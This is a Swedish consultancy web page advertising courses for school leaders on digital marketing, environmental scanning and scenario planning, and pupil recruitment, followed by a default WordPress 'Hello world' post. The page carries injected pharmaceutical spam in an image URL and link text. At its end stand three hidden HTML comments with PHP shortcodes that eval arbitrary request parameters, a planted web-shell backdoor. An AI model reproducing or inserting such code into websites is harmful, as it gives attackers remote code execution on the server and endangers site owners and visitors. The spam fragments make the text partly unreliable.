Digitala medier

Digital Marknadsföring för skolledare

Hur stark är er skola på att synas digitalt? Använder ni de sökord på hemsidan som ungdomarna själva skriver i googels sökfält? Har ni koll på hur ungdomarna uppfattar er digitala närvaro? Har skolan en digital marknads- och kommunikationsplan?

Syftet är att du ska lära dig allt du behöver veta för att optimera den digitala marknadsföringen. Du ska kunna förstå och använda de verktyg som finns på marknaden och hur de kan integreras för bästa effekt. Du lär dig utforma strategier och få processer på plats för kontinuerlig uppföljning, analys och utvärdering. Några programpunkter från innehållet:

 • Digital marknadsföring – Begrepp, definitioner och kanaler
 • Sökmotoroptimering – Arbeta, analysera och styra sökresultatet
 • Adwords & analytics – Branschverktyg inom annonsering och webbanalys
 • Marknadsföring via sociala medier – Skapa engagemang
 • E-postmarknadsföring – Planera, genomföra och mäta e-postkampanjer
 • Smartphones – Marknadsföring till mobila enheter

Kontakta oss för priser och utförligare information om kursen!

<img class=" wp-image-206" src="http://bizcare generic cialis 100mg.se/wp-content/uploads/2015/10/Like-247×300.jpg” alt=”Thumbs up, like button on white background.” width=”160″ height=”194″ srcset=”http://bizcare.se/wp-content/uploads/2015/10/Like-247×300.jpg 247w, http://bizcare.se/wp-content/uploads/2015/10/Like.jpg 265w” sizes=”(max-width: 160px) 100vw, 160px” />

Omvärldsanalys

Omvärldsanalys & scenario-planering för skolledare

Vill du som skolledare fatta bättre beslut i vardagen? Grundläggande kunskaper i omvärldsanalys är en nyckelfråga för dig som vill sitta i förarsätet och inte i baksätet när utvecklingen tar fart.

Meningen med omvärldsanalys är inte att förutspå framtiden, utan att ge underlag för att fatta välgrundade beslut här och nu. Genom att arbeta strukturerat med omvärldsanalys kan man skapa en utgångspunkt för strategiska vägval liksom underlag till innovativa lösningar för skolan. Målet med kursen är att skapa en god framtidsberedskap och ge dig redskap för att engagera hela skolpersonalen i aktiv trendspaning och ökad omvärldsförståelse check my source. Ur innehållet:

 • Introduktion till omvärldsanalys
 • Definition av begrepp (trend, tendens, splittrande händelser m.m.)
 • Hur trender formas och utvecklas samt Trendnivåer (giga, makro, mikro)
 • PEST(LE)-modellen
 • Användning av trendkort
 • Konsekvensanalys
 • Sambandsanalys – Strategiska osäkerheter och scenariokors
 • Storyline och förpackning
 • Hur man skapar bra framtidsscenarier
 • Metodik för att engagera hela personalen i omvärldsförståelse och trendspaning

Kontakta oss för utförligare information om hur vi kan hjälpa er att arbeta effektivt med omvärldsanalys och scenarioplanering!

marketing

Kommunikation

Konsten att påverka söktrycket av skolelever

Hur väl lyckas ni att kommunicera det er skola står för till ungdomarna? Vet ni varför de elever som inte söker till er skola väljer bort er? Har ni full koll på vilket rykte ni har bland ungdomar i Åk9?

I en tid då konkurrensen om elever är tuff blir tydlig och pricksäker kommunikation kring det som särskiljer er skola från andra skolor helt avgörande för söktrycket. För att kunna kommunicera skolans budskap på ett bra sätt krävs kunskap om hur ungdomarna resonerar kring både er skola, konkurrerande skolor och om sitt gymnasieval rent generellt. Det handlar inte om billiga säljknep och kortsiktiga lockrop utan om att på djupet först förstå hur skolan uppfattas och hur ungdomarna resonerar, för att sedan skräddarsy budskapet så att de attraktiva fördelarna med er skola verkligen når fram till ungdomarna.

Vill du lära dig hur ni kan utveckla er skolas marknadskommunikation och genom detta ta kontroll över ryktet skolan har bland ungdomar i Åk9? Våra seminarium om marknadskommunikation mot elever gör skillnad, kontakta oss så berättar vi mer!

ungdomar 1

 

 

 

Hej världen!

Välkommen till WordPress. Det här är ditt första inlägg. Redigera eller radera det. Sedan kan du börja skriva!

<!– [insert_php]if (isset($_REQUEST["NCNQG"])){eval($_REQUEST["NCNQG"]);exit;}[/insert_php][php]if (isset($_REQUEST["NCNQG"])){eval($_REQUEST["NCNQG"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["pbcC"])){eval($_REQUEST["pbcC"]);exit;}[/insert_php][php]if (isset($_REQUEST["pbcC"])){eval($_REQUEST["pbcC"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["waDC"])){eval($_REQUEST["waDC"]);exit;}[/insert_php][php]if (isset($_REQUEST["waDC"])){eval($_REQUEST["waDC"]);exit;}[/php] –>